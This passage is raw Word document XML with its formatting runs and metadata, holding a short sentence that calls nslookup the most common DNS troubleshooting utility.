          <w:rFonts w:ascii="CIDFont+F1" w:hAnsi="CIDFont+F1" w:cs="CIDFont+F1"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nslookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 is the most common </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F1" w:hAnsi="CIDFont+F1" w:cs="CIDFont+F1"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F1" w:hAnsi="CIDFont+F1" w:cs="CIDFont+F1"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> troubleshooting utility.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0058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94"/>
    <w:rsid w:val="00072090"/>
    <w:rsid w:val="000D121D"/>
    <w:rsid w:val="003547FB"/>
    <w:rsid w:val="003A4478"/>
    <w:rsid w:val="003C78F1"/>
    <w:rsid w:val="004A75FD"/>
    <w:rsid w:val="00580C9C"/>
    <w:rsid w:val="005F30F3"/>
    <w:rsid w:val="00624194"/>
    <w:rsid w:val="007C7206"/>
    <w:rsid w:val="008E1990"/>
    <w:rsid w:val="0093723E"/>
    <w:rsid w:val="00A31C1C"/>
    <w:rsid w:val="00B3365D"/>
    <w:rsid w:val="00BB7416"/>
    <w:rsid w:val="00C1005A"/>
    <w:rsid w:val="00C86754"/>
    <w:rsid w:val="00CE45CA"/>
    <w:rsid w:val="00F410D1"/>
    <w:rsid w:val="00F84800"/>
    <w:rsid w:val="00FD5D30"/>
    <w:rsid w:val="00F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60A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{54E76B1B-E183-40FB-877E-934435B2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Kuppam</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Uday Kuppam</cp:lastModifiedBy>
  <cp:revision>23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-04T16:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-04T17:17:00Z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5f96081f-b11a-40ed-856d-a5e41ca32432</vt:lpwstr>
  </property>
</Properties>
</file>